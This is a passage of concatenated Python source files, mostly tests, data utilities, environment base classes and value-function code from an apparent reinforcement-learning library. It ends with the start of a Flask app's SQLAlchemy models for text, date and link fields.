max_len, num_episodes * (episode_length + num_memory_steps)
)
def test_get_item(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
memory.end_episode()
observation, idx, weight = memory[0]
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
assert idx == 0
assert weight == 1.0
for i in range(len(memory)):
observation, idx, weight = memory[i]
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
if memory.valid[i]:
assert idx == i
else:
assert idx != i
assert weight == 1.0
i = np.random.choice(memory.valid_indexes).item()
observation, idx, weight = memory[i]
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
assert idx == i
assert weight == 1.0
def test_is_full(self, discrete, dim_state, dim_action, max_len, num_memory_steps):
num_transitions = 98
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
if num_transitions >= max_len:
assert memory.is_full
else:
assert not memory.is_full
memory.end_episode()
if num_transitions + num_memory_steps >= max_len:
assert memory.is_full
else:
assert not memory.is_full
def test_all_data(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
observation = memory.all_data
len_valid_data = len(memory.valid_indexes)
if memory.is_full:
for attribute in observation:
assert attribute.shape[0] == max_len - num_memory_steps
assert attribute.shape[0] == len_valid_data
else:
for attribute in observation:
assert attribute.shape[0] == num_episodes * episode_length
assert attribute.shape[0] == len_valid_data
def test_num_memory_steps(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
self._test_sample_batch(memory, 10, num_memory_steps)
assert memory.num_memory_steps == num_memory_steps
memory.num_memory_steps = 10
assert memory.num_memory_steps == 10
self._test_sample_batch(memory, 10, 10)
memory.num_memory_steps = 2
assert memory.num_memory_steps == 2
self._test_sample_batch(memory, 10, 2)
def test_append_error(self):
memory = ExperienceReplay(max_len=100)
with pytest.raises(TypeError):
memory.append((1, 2, 3, 4, 5))
def test_valid_indexes(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
for i in memory.valid_indexes:
assert memory.valid[i] == 1
if not memory.is_full:
assert len(memory.valid_indexes) == num_episodes * episode_length
else:
assert len(memory.valid_indexes) == max_len - num_memory_steps
def test_iter(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
for idx, (observation, idx_, weight) in enumerate(memory):
if idx >= len(memory):
continue
if memory.valid[idx] == 1:
assert idx == idx_
else:
assert idx != idx_
assert weight == 1.0
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
```
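The assertions above revolve around a circular buffer with a write pointer (`ptr`), a `valid` mask, and `num_memory_steps` padding slots that are marked invalid at episode boundaries. The sketch below is a toy stand-in, not the rllib `ExperienceReplay` implementation; it only illustrates the wrap-around bookkeeping that the tests check, and all names in it are made up.
```python
import numpy as np

class ToyRingBuffer:
    """Minimal circular buffer mimicking the ptr/valid bookkeeping tested above."""

    def __init__(self, max_len, num_memory_steps=0):
        self.max_len = max_len
        self.num_memory_steps = num_memory_steps
        self.memory = np.full((max_len,), None)
        self.valid = np.zeros(max_len, dtype=int)
        self.ptr = 0
        self.data_count = 0

    def append(self, item):
        self.memory[self.ptr] = item
        self.valid[self.ptr] = 1
        # The next num_memory_steps slots cannot yet start a full sub-trajectory.
        for i in range(1, self.num_memory_steps + 1):
            self.valid[(self.ptr + i) % self.max_len] = 0
        self.ptr = (self.ptr + 1) % self.max_len
        self.data_count += 1

    def end_episode(self):
        # Pad the episode boundary with invalid slots so windows never cross it.
        for _ in range(self.num_memory_steps):
            self.memory[self.ptr] = None
            self.valid[self.ptr] = 0
            self.ptr = (self.ptr + 1) % self.max_len
            self.data_count += 1

buf = ToyRingBuffer(max_len=8, num_memory_steps=2)
for t in range(5):
    buf.append(t)
buf.end_episode()
assert buf.ptr == 7 and buf.valid[5] == 0 and buf.valid[6] == 0
```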
#### File: transforms/tests/test_transforms_utilities.py
```python
import pytest
import torch
import torch.testing
from rllib.dataset.transforms.normalizer import Normalizer
from rllib.util.utilities import get_backend
@pytest.fixture(params=[True, False])
def preserve_origin(request):
return request.param
def test_backend():
assert torch == get_backend(torch.randn(4))
def test_update(preserve_origin):
array = torch.randn(32, 4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
torch.testing.assert_allclose(transformer.mean, torch.mean(array, 0))
torch.testing.assert_allclose(transformer.variance, torch.var(array, 0))
def test_normalize(preserve_origin):
array = torch.randn(32, 4)
new_array = torch.randn(4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
transformed_array = transformer(new_array)
if preserve_origin:
mean = 0
scale = torch.sqrt(torch.var(array, 0) + torch.mean(array, 0) ** 2)
else:
mean = torch.mean(array, 0)
scale = torch.sqrt(torch.var(array, 0))
torch.testing.assert_allclose(transformed_array, (new_array - mean) / scale)
def test_unnormalize(preserve_origin):
array = torch.randn(32, 4)
new_array = torch.randn(4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
transformed_array = transformer(new_array)
back_array = transformer.inverse(transformed_array)
torch.testing.assert_allclose(back_array, new_array)
def test_sequential_update(preserve_origin):
torch.manual_seed(0)
array = torch.randn(16, 4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
torch.testing.assert_allclose(transformer.mean, torch.mean(array, 0))
torch.testing.assert_allclose(transformer.variance, torch.var(array, 0))
for _ in range(10):
new_array = torch.randn(torch.randint(1, 32, (1,)), 4)
transformer.update(new_array)
array = torch.cat((array, new_array), dim=0)
torch.testing.assert_allclose(transformer.mean, torch.mean(array, 0))
torch.testing.assert_allclose(transformer.variance, torch.var(array, 0))
```
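`test_sequential_update` above requires the `Normalizer` to keep a mean and variance that match `torch.mean`/`torch.var` over everything it has seen so far. The following is a hedged sketch of one way to merge batch statistics so that this holds (the pairwise update of Chan et al.); it is illustrative only and is not the rllib `Normalizer` code.
```python
import torch

def merge_stats(count, mean, var, batch):
    """Merge running (count, mean, unbiased var) with a new batch of rows."""
    n = batch.shape[0]
    batch_mean, batch_var = batch.mean(0), batch.var(0)
    total = count + n
    delta = batch_mean - mean
    new_mean = mean + delta * n / total
    m_old = var * (count - 1)       # sum of squared deviations seen so far
    m_batch = batch_var * (n - 1)   # sum of squared deviations in the batch
    new_var = (m_old + m_batch + delta ** 2 * count * n / total) / (total - 1)
    return total, new_mean, new_var

torch.manual_seed(0)
chunks = [torch.randn(16, 4), torch.randn(9, 4), torch.randn(31, 4)]
count, mean, var = 0, torch.zeros(4), torch.zeros(4)
for c in chunks:
    count, mean, var = merge_stats(count, mean, var, c)
full = torch.cat(chunks, dim=0)
torch.testing.assert_allclose(mean, full.mean(0))
torch.testing.assert_allclose(var, full.var(0))
```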
#### File: rllib/dataset/utilities.py
```python
from itertools import product
import numpy as np
import torch
from .datatypes import Observation
def _cast_to_iter_class(generator, class_):
if class_ in (tuple, list):
return class_(generator)
else:
return class_(*generator)
def map_observation(func, observation):
"""Map observations through the function func."""
return Observation(*map(lambda x: func(x), observation))
def map_and_cast(fun, iter_):
"""Map a function on a iterable and recast the resulting generator.
Parameters
----------
fun : callable
iter_ : iterable
"""
generator = map(fun, zip(*iter_))
return _cast_to_iter_class(generator, iter_[0].__class__)
def average_named_tuple(named_tuple_):
"""Return an averaged named-tuple."""
return type(named_tuple_)(*map(lambda x: x.mean().item(), named_tuple_))
def average_dataclass(dataclass_):
"""Return an averaged data-class."""
d = []
for val in dataclass_:
d.append(val.mean().item())
return type(dataclass_)(*d)
def stack_list_of_tuples(iter_, dim=None):
"""Convert a list of observation tuples to a list of numpy arrays.
Parameters
----------
iter_: list
Each entry represents one row in the resulting vectors.
dim: int, optional (default=0).
Returns
-------
*arrays
One stacked array for each entry in the tuple.
"""
try:
if dim is None:
generator = map(torch.stack, zip(*iter_))
else:
generator = map(
lambda x: torch.stack(
x, dim=(dim if x[0].ndim > max(dim, -dim - 1) else -1)
),
zip(*iter_),
)
return _cast_to_iter_class(generator, iter_[0].__class__)
except (TypeError, AttributeError):
generator = map(np.stack, zip(*iter_))
return _cast_to_iter_class(generator, iter_[0].__class__)
def bootstrap_trajectory(trajectory, bootstraps):
"""Bootstrap a trajectory into `bootstrap' different i.i.d. trajectories."""
num_points = len(trajectory)
new_trajectories = []
for _ in range(bootstraps):
idx = np.random.choice(num_points, num_points, replace=True)
t = []
for i in idx:
t.append(trajectory[i])
new_trajectories.append(t)
return new_trajectories
def batch_trajectory_to_single_trajectory(trajectory):
"""Convert a batch trajectory into a single trajectory.
A batch trajectory contains a list of batch observations, e.g., Observations with
states that have b x h x dim_states dimensions.
    Return a Trajectory that has just 1 x dim_states.
"""
batch_shape = trajectory[0].state.shape[:-1]
out = []
for batch_obs in trajectory:
expanded_obs = Observation(
*[k.repeat(batch_shape) if k.dim() < 1 else k for k in batch_obs]
)
squeezed_obs = Observation(
*[k.reshape(-1, *k.shape[len(batch_shape) :]) for k in expanded_obs]
)
out += [Observation(*k) for k in zip(*squeezed_obs)]
return out
def concatenate_observations(observation, new_observation):
"""Concatenate observations and return a new observation."""
return Observation(
*[
torch.cat((a, b.unsqueeze(0)), dim=0)
for a, b in zip(observation, new_observation)
]
)
def gather_trajectories(trajectories, gather_dim=1):
"""Gather parallel trajectories.
Parameters
----------
trajectories: List[Trajectory].
gather_dim: int, optional. (default=1).
"""
batch_trajectories = [stack_list_of_tuples(traj) for traj in trajectories]
trajectory = Observation(
*map(
lambda args: torch.cat(args, dim=gather_dim)
if args[0].dim() > 1
else torch.stack(args, -1),
zip(*batch_trajectories),
)
)
return trajectory
def unstack_observations(observation):
"""Unstack observations in a list."""
in_dim = observation.reward.shape[:-1]
# don't consider the last reward dimension.
# this changed after making the rewards multi-dimensional.
observations = []
for indexes in product(*map(range, in_dim)):
def _extract_index(tensor):
try:
return tensor[indexes]
except IndexError:
return tensor
observations.append(map_observation(_extract_index, observation))
return observations
def chunk(array, num_memory_steps):
"""Chunk an array into size of N steps.
The array of size N x k_1 x ... k_n will be reshaped to be of size
Batch x num_memory_steps x k_1 x ... k_n.
Parameters
----------
array: Array.
Array to reshape.
num_memory_steps: int.
Number of steps to chunk the batch.
Returns
-------
array: Array.
Chunked Array.
"""
batch_size = array.shape[0] // num_memory_steps
return array.reshape(batch_size, num_memory_steps, *array.shape[1:])
def d4rl_to_observation(dataset):
"""Transform a d4rl dataset into an observation dataset.
Parameters
----------
dataset: Dict.
Dict with dataset.
Returns
-------
observation: Observation
        Dataset in observation format.
"""
num_points = dataset["observations"].shape[0]
dim_state = dataset["observations"].shape[1]
dim_actions = dataset["actions"].shape[1]
dataset = Observation(
state=dataset["observations"].reshape(num_points, 1, dim_state),
action=dataset["actions"].reshape(num_points, 1, dim_actions),
reward=dataset["rewards"].reshape(num_points, 1, 1),
next_state=dataset["next_observations"].reshape(num_points, 1, dim_state),
done=dataset["terminals"].reshape(num_points, 1, 1),
log_prob_action=dataset["infos/action_log_probs"].reshape(num_points, 1, 1),
).to_torch()
return dataset
def split_observations_by_done(observation):
"""Split an observation into a list of observations."""
end_indexes = torch.where(observation.done)[0]
start_indexes = torch.cat((torch.tensor([0]), end_indexes + 1))[:-1]
observations = []
def _extract_index(tensor, start_index_, end_index_):
try:
return tensor[start_index_ : end_index_ + 1]
except IndexError:
return tensor
for start_index, end_index in zip(start_indexes, end_indexes):
observations.append(
map_observation(
lambda x: _extract_index(x, start_index, end_index), observation
)
)
return observations
def drop_last(observation, k):
"""Drop last k indexes from observation."""
#
def _extract_index(tensor):
try:
return tensor[:-k]
except IndexError:
return tensor
return map_observation(_extract_index, observation)
def _observation_to_num_memory_steps_with_repeat(observation, num_memory_steps):
"""Do something."""
#
def _safe_repeat(tensor):
try:
shape = torch.tensor(tensor.shape)
shape[0] = (shape[0] - num_memory_steps) + 1
shape[1] = num_memory_steps
out = torch.zeros(*shape)
for i in range(num_memory_steps):
first_idx = i
last_idx = first_idx + shape[0]
out[:, i, :] = tensor[first_idx:last_idx, 0, :]
return out
except IndexError:
return tensor
return map_observation(_safe_repeat, observation)
def _observation_to_num_memory_steps(observation, num_memory_steps, repeat=False):
"""Get an observation and chunk it into batches of num_memory_steps."""
if repeat:
return _observation_to_num_memory_steps_with_repeat(
observation, num_memory_steps
)
num_transitions = observation.state.shape[0]
drop_k = num_transitions % num_memory_steps
if drop_k > 0:
# drop last k transitions.
observation = drop_last(observation, drop_k)
def _safe_chunk(tensor):
try:
return chunk(tensor.squeeze(), num_memory_steps)
except IndexError:
return tensor
return map_observation(_safe_chunk, observation)
def observation_to_num_memory_steps(observation, num_memory_steps, repeat=False):
"""Convert an observation to num_memory_steps."""
# split into trajectories
trajectory = split_observations_by_done(observation)
# convert each trajectory to num step chunks
chunked_trajectories = trajectory_to_num_memory_steps(
trajectory, num_memory_steps, repeat=repeat
)
# gather back trajectories into an observation.
return merge_observations(chunked_trajectories)
def trajectory_to_num_memory_steps(trajectory, num_memory_steps, repeat=False):
"""Trajectory to num_memory_steps."""
chunked_observations = []
for observation in trajectory:
chunked_observations.append(
_observation_to_num_memory_steps(
observation, num_memory_steps, repeat=repeat
)
)
return chunked_observations
def merge_observations(trajectory, dim=0):
"""Concatenate observations and return a new observation."""
observation = trajectory[0]
for new_observation in trajectory[1:]:
observation = Observation(
*[
torch.cat((a, b), dim=dim) if a.dim() > 0 else a
for a, b in zip(observation, new_observation)
]
)
return observation
def flatten_observation(observation):
"""Flatten an observation by reshaping the time coordinates."""
#
def _flatten(tensor):
try:
return tensor.reshape(-1, tensor.shape[-1])
except IndexError:
return tensor
return map_observation(func=_flatten, observation=observation)
```
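A small usage sketch for two of the helpers above, `stack_list_of_tuples` and `chunk`; the tensors and shapes are illustrative only.
```python
import torch
from rllib.dataset.utilities import chunk, stack_list_of_tuples

# Stack a list of (state, reward) tuples: each position is stacked along a new axis.
pairs = [(torch.full((3,), float(t)), torch.tensor([float(t)])) for t in range(6)]
states, rewards = stack_list_of_tuples(pairs)
print(states.shape)   # torch.Size([6, 3])
print(rewards.shape)  # torch.Size([6, 1])

# chunk reshapes the leading axis N into Batch x num_memory_steps.
print(chunk(states, 2).shape)  # torch.Size([3, 2, 3])
```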
#### File: rllib/environment/abstract_environment.py
```python
from abc import ABCMeta, abstractmethod
from gym.spaces import Box
class AbstractEnvironment(object, metaclass=ABCMeta):
"""Interface for Environments.
Parameters
----------
dim_state: Tuple
dimension of state.
dim_action: Tuple
dimension of action.
observation_space: gym.env.Spaces
action_space: gym.env.Spaces
dim_observation: int, optional
dimension of observation.
num_observations: int, optional
number of discrete observations (None if observation is continuous).
num_actions: int, optional
number of discrete actions (None if action is continuous).
Methods
-------
step(action): next_state, reward, done, info
execute a step in the environment.
reset(): reset the environment.
"""
def __init__(
self,
dim_state,
dim_action,
observation_space,
action_space,
dim_observation=(-1,),
num_states=-1,
num_actions=-1,
num_observations=-1,
dim_reward=(1,),
):
super().__init__()
self.dim_action = dim_action
self.dim_state = dim_state
self.num_actions = num_actions if num_actions is not None else -1
self.num_observations = num_observations if num_observations is not None else -1
self.num_states = num_states if num_states is not None else -1
if dim_observation == (-1,):
dim_observation = dim_state
self.dim_observation = dim_observation
self.action_space = action_space
self.observation_space = observation_space
self.discrete_state = self.num_states >= 0
self.discrete_action = self.num_actions >= 0
self.discrete_observation = self.num_observations >= 0
self.dim_reward = dim_reward
self.metadata = {"render.modes": []}
def __str__(self):
"""Return string that explains environment."""
if self.discrete_state:
state_str = f"{self.num_states} discrete states"
else:
state_str = f"{self.dim_state} continuous states"
if self.discrete_action:
action_str = f"{self.num_actions} discrete actions"
else:
action_str = f"{self.dim_action} continuous actions"
return f"{self.name}, {state_str}, {action_str}."
@abstractmethod
def step(self, action):
"""Run one time-step of the model dynamics.
Parameters
----------
action: ndarray
Returns
-------
observation: ndarray
reward: float
done: bool
info: dict
"""
raise NotImplementedError
@abstractmethod
def reset(self):
"""Reset the state of the model and returns an initial observation.
Returns
-------
observation: ndarray
"""
raise NotImplementedError
def render(self, mode="human"):
"""Render the environment.
The set of supported modes varies per environment. (And some
environments do not support rendering at all.) By convention,
if mode is:
- human: render to the current display or terminal and
return nothing. Usually for human consumption.
- rgb_array: Return an numpy.ndarray with shape (x, y, 3),
representing RGB values for an x-by-y pixel image, suitable
for turning into a video.
- ansi: Return a string (str) or StringIO.StringIO containing a
terminal-style text representation. The text can include newlines
and ANSI escape sequences (e.g. for colors).
Parameters
----------
mode: str.
The mode to render with
Note
----
Make sure that your class's metadata 'render.modes' key includes
the list of supported modes. It's recommended to call super()
in implementations to use the functionality of this method.
"""
pass
def close(self):
"""Override close in your subclass to perform any necessary cleanup.
Environments will automatically close() themselves when
garbage collected or when the program exits.
"""
pass
@property
def action_scale(self):
"""Return the action scale of the environment."""
if self.discrete_action:
return 1
elif isinstance(self.action_space, Box):
return 1 / 2 * (self.action_space.high - self.action_space.low)
else:
raise NotImplementedError
@property
def goal(self):
"""Return current goal of environment."""
return None
@property # type: ignore
@abstractmethod
def state(self):
"""Return current state of environment."""
raise NotImplementedError
@state.setter # type: ignore
@abstractmethod
def state(self, value):
raise NotImplementedError
@property
@abstractmethod
def time(self):
"""Return current time of environment."""
raise NotImplementedError
@property
def name(self):
"""Return class name."""
return self.__class__.__name__
class EnvironmentBuilder(object, metaclass=ABCMeta):
"""Abstract Environment Builder."""
@abstractmethod
def create_environment(self):
"""Create environment."""
raise NotImplementedError
def get_dynamical_model(self):
"""Get dynamical model."""
return None
def get_reward_model(self):
"""Get reward model."""
return None
def get_termination_model(self):
"""Get termination model."""
return None
```
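A minimal, hedged sketch of what a concrete subclass of `AbstractEnvironment` can look like: a one-dimensional integrator whose action is added to the state. The class, its reward, and its spaces are made up for illustration and are not part of rllib.
```python
import numpy as np
from gym.spaces import Box

from rllib.environment.abstract_environment import AbstractEnvironment

class ToyIntegrator(AbstractEnvironment):
    """1-D integrator: the action is added to the state at every step."""

    def __init__(self):
        super().__init__(
            dim_state=(1,),
            dim_action=(1,),
            observation_space=Box(low=-np.inf, high=np.inf, shape=(1,)),
            action_space=Box(low=-1.0, high=1.0, shape=(1,)),
        )
        self._state = np.zeros(1)
        self._time = 0

    def step(self, action):
        self._state = self._state + action
        self._time += 1
        reward = -abs(float(self._state[0]))  # stay close to the origin
        return self._state, reward, False, {}

    def reset(self):
        self._state = np.zeros(1)
        self._time = 0
        return self._state

    @property
    def state(self):
        return self._state

    @state.setter
    def state(self, value):
        self._state = value

    @property
    def time(self):
        return self._time

env = ToyIntegrator()
env.reset()
observation, reward, done, info = env.step(np.array([0.5]))
print(env)  # ToyIntegrator, (1,) continuous states, (1,) continuous actions.
```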
#### File: environment/systems/abstract_system.py
```python
from abc import ABCMeta, abstractmethod
import numpy as np
from gym import spaces
class AbstractSystem(object, metaclass=ABCMeta):
"""Interface for physical systems with continuous state-action spaces.
Parameters
----------
dim_state: Tuple
dim_action: Tuple
dim_observation: Tuple, optional
Methods
-------
state: ndarray
return the current state of the system.
time: int or float
return the current time step.
reset(state):
reset the state.
step(action): ndarray
execute a one step simulation and return the next state.
"""
def __init__(self, dim_state, dim_action, dim_observation=None):
super().__init__()
self.dim_state = dim_state
self.dim_action = dim_action
if dim_observation is None:
dim_observation = dim_state
self.dim_observation = dim_observation
self._time = 0
@property # type: ignore
@abstractmethod
def state(self):
"""Return the state of the system."""
raise NotImplementedError
@state.setter # type: ignore
@abstractmethod
def state(self, value):
raise NotImplementedError
@property
def time(self):
"""Return the current time of the system."""
return self._time
@abstractmethod
def step(self, action):
"""Do a one step ahead simulation of the system.
x' = f(x, action)
Parameters
----------
action: ndarray
Returns
-------
next_state: ndarray
"""
raise NotImplementedError
@abstractmethod
def reset(self, state):
"""Reset system and set state to `state'.
Parameters
----------
state: ndarray
"""
raise NotImplementedError
def render(self, mode="human"):
"""Render system."""
pass
@property
def action_space(self):
"""Return action space."""
return spaces.Box(
np.array([-1] * self.dim_action[0]), np.array([1] * self.dim_action[0])
)
@property
def observation_space(self):
"""Return observation space."""
return spaces.Box(
np.array([-1] * self.dim_observation[0]),
np.array([1] * self.dim_observation[0]),
)
```
#### File: environment/vectorized/util.py
```python
from abc import ABCMeta
import numpy as np
from gym import Env
from rllib.util.utilities import get_backend
class VectorizedEnv(Env, metaclass=ABCMeta):
"""Vectorized implementation of Acrobot."""
@property
def bk(self):
"""Get current backend of environment."""
return get_backend(self.state)
@property
def state(self):
"""Return the state of the system."""
return self._state
@state.setter
def state(self, value):
self._state = value
def set_state(self, state):
"""Set vectorized state."""
self.state = state
def get_state(self):
"""Set vectorized state."""
return self.state
def atan2(self, sin, cos):
"""Return signed angle of the sin cosine."""
if self.bk is np:
return self.bk.arctan2(sin, cos)
else:
return self.bk.atan2(sin, cos)
def clip(self, val, min_val, max_val):
"""Clip between min and max values."""
if self.bk is np:
return self.bk.clip(val, min_val, max_val)
else:
return self.bk.clamp(val, min_val, max_val)
def cat(self, arrays, axis=-1):
"""Concatenate arrays along an axis."""
if self.bk is np:
            return np.concatenate(arrays, axis)
else:
return self.bk.cat(arrays, axis)
def unsqueeze(self, array, axis=-1):
"""Unsqueeze array along axis."""
if self.bk is np:
return np.expand_dims(array, axis=axis)
else:
return array.unsqueeze(dim=axis)
def rand(self, min_val, max_val):
"""Return random number between min_val and max_val."""
        if self.bk is np:
            return np.random.rand() * (max_val - min_val) + min_val
        else:
            return min_val + (max_val - min_val) * self.bk.rand(1)
def step(self, action):
"""Run one timestep of the environment's dynamics.
When end of episode is reached, you are responsible for calling `reset()` to
reset this environment's state.
Accepts an action and returns a tuple (observation, reward, done, info).
Parameters
----------
action: np.ndarray
An action provided by the agent.
Returns
-------
observation: np.ndarray
Agent's observation of the current environment.
reward: float
Amount of reward returned after previous action.
done: bool
Whether the episode has ended.
info: dict
Contains auxiliary diagnostic information.
"""
raise NotImplementedError
def rk4(derivs, y0, t, *args, **kwargs):
"""Integrate 1D or ND system of ODEs using 4-th order Runge-Kutta.
This is a toy implementation which may be useful if you find
yourself stranded on a system w/o scipy. Otherwise use
:func:`scipy.integrate`.
*y0*
initial state vector
*t*
sample times
*derivs*
returns the derivative of the system and has the
signature ``dy = derivs(yi, ti)``
*args*
additional arguments passed to the derivative function
*kwargs*
additional keyword arguments passed to the derivative function
Example 1 ::
## 2D system
def derivs6(x,t):
d1 = x[0] + 2*x[1]
d2 = -3*x[0] + 4*x[1]
return (d1, d2)
dt = 0.0005
t = arange(0.0, 2.0, dt)
y0 = (1,2)
yout = rk4(derivs6, y0, t)
Example 2::
## 1D system
alpha = 2
def derivs(x,t):
return -alpha*x + exp(-t)
y0 = 1
yout = rk4(derivs, y0, t)
If you have access to scipy, you should probably be using the
scipy.integrate tools rather than this function.
"""
bk = get_backend(y0)
yout = bk.zeros((len(t), *y0.shape))
yout[0] = y0
for i in np.arange(len(t) - 1):
thist = t[i]
dt = t[i + 1] - thist
dt2 = dt / 2.0
y0 = yout[i]
k1 = derivs(y0, thist, *args, **kwargs)
k2 = derivs(y0 + dt2 * k1, thist + dt2, *args, **kwargs)
k3 = derivs(y0 + dt2 * k2, thist + dt2, *args, **kwargs)
k4 = derivs(y0 + dt * k3, thist + dt, *args, **kwargs)
yout[i + 1] = y0 + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)
return yout
```
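A short, self-contained check of the `rk4` helper above on a system with a known solution (exponential decay). The import path is assumed from the file layout shown for this repository.
```python
import numpy as np

# Assumed module path; the file above is environment/vectorized/util.py inside rllib.
from rllib.environment.vectorized.util import rk4

def derivs(x, t):
    """dx/dt = -2 x, whose exact solution is x(t) = exp(-2 t)."""
    return -2.0 * x

t = np.linspace(0.0, 2.0, 201)
y0 = np.array([1.0])
yout = rk4(derivs, y0, t)
assert np.allclose(yout[:, 0], np.exp(-2.0 * t), atol=1e-6)
```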
#### File: rllib/policy/random_policy.py
```python
from rllib.util.neural_networks.utilities import get_batch_size
from .abstract_policy import AbstractPolicy
class RandomPolicy(AbstractPolicy):
"""Random Policy implementation of AbstractPolicy base class.
This policy will always return a centered distribution with a unit scaling.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, state):
"""Get distribution over actions."""
batch_size = get_batch_size(state, self.dim_state)
if batch_size:
return self.random(batch_size)
else:
return self.random()
```
#### File: rllib/util/input_transformations.py
```python
from abc import ABC, abstractmethod
class AbstractTransform(ABC):
"""Abstract Transformation definition."""
extra_dim: int
@abstractmethod
def __call__(self, state):
"""Apply transformation."""
raise NotImplementedError
class ComposeTransforms(AbstractTransform):
"""Compose a list of transformations."""
def __init__(self, transforms):
super().__init__()
self.extra_dim = 0
for transform in transforms:
self.extra_dim += transform.extra_dim
self.transforms = transforms
def __call__(self, x):
"""Apply sequence of transformations."""
for transform in self.transforms:
x = transform(x)
return x
```
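A brief usage sketch of `ComposeTransforms` above with two made-up transforms; the composed transform applies them left to right and sums their `extra_dim` attributes.
```python
from rllib.util.input_transformations import AbstractTransform, ComposeTransforms

class Scale(AbstractTransform):
    """Multiply the state by a constant; adds no extra dimensions."""
    extra_dim = 0

    def __init__(self, factor):
        self.factor = factor

    def __call__(self, state):
        return self.factor * state

class Shift(AbstractTransform):
    """Add a constant offset to the state."""
    extra_dim = 0

    def __init__(self, offset):
        self.offset = offset

    def __call__(self, state):
        return state + self.offset

transform = ComposeTransforms([Scale(2.0), Shift(1.0)])
print(transform(3.0))       # 7.0: Scale runs first, then Shift
print(transform.extra_dim)  # 0: sum of the parts
```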
#### File: rllib/value_function/model_based_q_function.py
```python
import torch
from rllib.algorithms.simulation_algorithm import SimulationAlgorithm
from rllib.dataset.utilities import stack_list_of_tuples
from rllib.util.neural_networks.utilities import DisableGradient, unfreeze_parameters
from rllib.util.utilities import RewardTransformer
from rllib.util.value_estimation import mc_return
from .abstract_value_function import AbstractQFunction
from .integrate_q_value_function import IntegrateQValueFunction
class ModelBasedQFunction(AbstractQFunction):
"""Q function that arises from simulating the model.
Parameters
----------
policy: AbstractPolicy.
Policy with which to rollout the model.
value_function: AbstractValueFunction, optional.
Value function with which to bootstrap the value estimate.
gamma: float, optional (default=1.0).
Discount factor.
entropy_regularization: float, optional (default=0.0).
Entropy regularization for rewards.
reward_transformer: RewardTransformer, optional.
Reward transformer module.
"""
def __init__(
self,
dynamical_model,
reward_model,
num_model_steps=1,
num_particles=15,
termination_model=None,
policy=None,
value_function=None,
gamma=1.0,
lambda_=1.0,
reward_transformer=RewardTransformer(),
entropy_regularization=0.0,
*args,
**kwargs,
):
super().__init__(
dim_state=value_function.dim_state,
dim_action=dynamical_model.dim_action,
*args,
**kwargs,
)
self.simulator = SimulationAlgorithm(
dynamical_model=dynamical_model,
reward_model=reward_model,
num_model_steps=num_model_steps,
num_particles=num_particles,
termination_model=termination_model,
)
assert num_model_steps > 0, "At least one-step ahead simulation."
if policy is None:
assert (
num_model_steps == 1
), "If no policy is passed, then only one-step ahead."
self.value_function = value_function
self.lambda_ = lambda_
self.policy = policy
self.gamma = gamma
self.reward_transformer = reward_transformer
self.entropy_regularization = entropy_regularization
def set_policy(self, new_policy):
"""Set policy."""
self.policy = new_policy
try:
self.value_function.set_policy(new_policy)
except AttributeError:
pass
def forward(self, state, action=torch.tensor(float("nan"))):
"""Get value at a given state-(action) through simulation.
Parameters
----------
state: Tensor.
State where to evaluate the value.
action: Tensor, optional.
First action of simulation.
"""
unfreeze_parameters(self.policy)
with DisableGradient(
self.simulator.dynamical_model,
self.simulator.reward_model,
self.simulator.termination_model,
):
sim_trajectory = self.simulator.simulate(state, self.policy, action)
sim_observation = stack_list_of_tuples(sim_trajectory, dim=state.ndim - 2)
if isinstance(self.value_function, IntegrateQValueFunction):
cm = DisableGradient(self.value_function.q_function)
else:
cm = DisableGradient(self.value_function)
with cm:
v = mc_return(
sim_observation,
gamma=self.gamma,
lambda_=self.lambda_,
value_function=self.value_function,
reward_transformer=self.reward_transformer,
entropy_regularization=self.entropy_regularization,
reduction="none",
)
v = v.reshape(
self.simulator.num_particles, # num particles.
state.shape[0], # batch shape
1, # time coordinate.
self.simulator.reward_model.dim_reward[0], # dim_reward
-1, # possible ensemble dimension.
).mean(0)
v = v[..., 0] # In cases of ensembles return first component.
return v
``` |
{
"source": "4ku/flaskProject",
"score": 2
} |
#### File: app/dynamic_fields/models.py
```python
from app import db
class Text_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("text", uselist=False,cascade="all, delete, delete-orphan"))
class TextArea_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("textArea", uselist=False,cascade="all, delete, delete-orphan"))
class Date_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.DateTime())
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
backref=db.backref("date", uselist=False,cascade="all, delete, delete-orphan"))
class Link_field(db.Model):
id = db.Column(db.Integer, primary_key=True)
data = db.Column(db.Unicode(255))
media_id = db.Column(db.Integer, db.ForeignKey('media.id'))
media = db.relationship("Media", single_parent=True, uselist=False,
